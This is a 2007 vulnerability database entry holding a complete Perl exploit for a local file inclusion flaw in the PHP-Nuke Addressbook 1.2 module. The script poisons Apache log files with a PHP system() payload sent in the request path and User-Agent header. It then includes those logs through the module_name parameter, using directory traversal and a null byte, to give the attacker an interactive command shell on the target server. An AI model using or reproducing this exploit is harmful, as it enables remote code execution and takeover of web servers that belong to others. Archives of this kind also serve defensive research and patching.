PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit

2007-03-28T00:00:00
ID SSV:6497
Type seebug
Reporter Root
Modified 2007-03-28T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!Perl
#
#PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit
#
#Vendor: http://www.sb-websoft.com/index.php?name=CmodsDownload&file=index&req=getit&lid=14
#
#Vulnerable Code: require_once(\"modules/$module_name/include/func.inc.php\");
#
#Coded by bd0rk || SOH-Crew
#
#Greetz: str0ke, TheJT, saint, CodeR, rgod, Kacper
#

use IO::Socket;
use LWP::Simple;

#ripped

@apache=(
\"../../../../../var/log/httpd/access_log\",
\"../../../../../var/log/httpd/error_log\",
\"../apache/logs/error.log\",
\"../apache/logs/access.log\",
\"../../apache/logs/error.log\",
\"../../apache/logs/access.log\",
\"../../../apache/logs/error.log\",
\"../../../apache/logs/access.log\",
\"../../../../apache/logs/error.log\",
\"../../../../apache/logs/access.log\",
\"../../../../../apache/logs/error.log\",
\"../../../../../apache/logs/access.log\",
\"../logs/error.log\",
\"../logs/access.log\",
\"../../logs/error.log\",
\"../../logs/access.log\",
\"../../../logs/error.log\",
\"../../../logs/access.log\",
\"../../../../logs/error.log\",
\"../../../../logs/access.log\",
\"../../../../../logs/error.log\",
\"../../../../../logs/access.log\",
\"../../../../../etc/httpd/logs/access_log\",
\"../../../../../etc/httpd/logs/access.log\",
\"../../../../../etc/httpd/logs/error_log\",
\"../../../../../etc/httpd/logs/error.log\",
\"../../.. /../../var/www/logs/access_log\",
\"../../../../../var/www/logs/access.log\",
\"../../../../../usr/local/apache/logs/access_log\",
\"../../../../../usr/local/apache/logs/access.log\",
\"../../../../../var/log/apache/access_log\",
\"../../../../../var/log/apache/access.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/www/logs/error_log\",
\"../../../../../var/www/logs/error.log\",
\"../../../../../usr/local/apache/logs/error_log\",
\"../../../../../usr/local/apache/logs/error.log\",
\"../../../../../var/log/apache/error_log\",
\"../../../../../var/log/apache/error.log\",
\"../../../../../var/log/access_log\",
\"../../../../../var/log/error_log\"
);

if (@ARGV < 3) {
print \"
PHP-Nuke Module Addressbook 1.2 Local File Inclusion Exploit
###############################################################
Usage: exploit.pl [victim] /modules/Addressbook/ [apachepath]
###############################################################
\";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];
$apachepath=$ARGV[2];

print \"Code is injecting in logfiles...
\";
$CODE=\"<?php ob_clean();system($HTTP_COOKIE_VARS[cmd]);die;?>\";
$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.

\";
print $socket \"GET \".$path.$CODE.\" HTTP/1.1
\";
print $socket \"user-Agent: \".$CODE.\"
\";
print $socket \"Host: \".$host.\"
\";
print $socket \"Connection: close

\";
close($socket);
print \"Write END to exit!
\";
print \"If not working try another apache path

\";

print \"[shell] \";$cmd = <STDIN>;

while($cmd !~ \"END\") {
$socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$host\", PeerPort=>\"80\") or die \"Connection failed.

\";

#now include parameter

print $socket \"GET \".$path.\"addressbook.php?module_name=\".$apache[$apachepath].\"%00&cmd=$cmd HTTP/1.1
\";
print $socket \"Host: \".$host.\"
\";
print $socket \"Accept: */*
\";
print $socket \"Connection: close

\";

while ($raspuns = <$socket>)
{

print $raspuns;
}

print \"[shell] \";
$cmd = <STDIN>;
}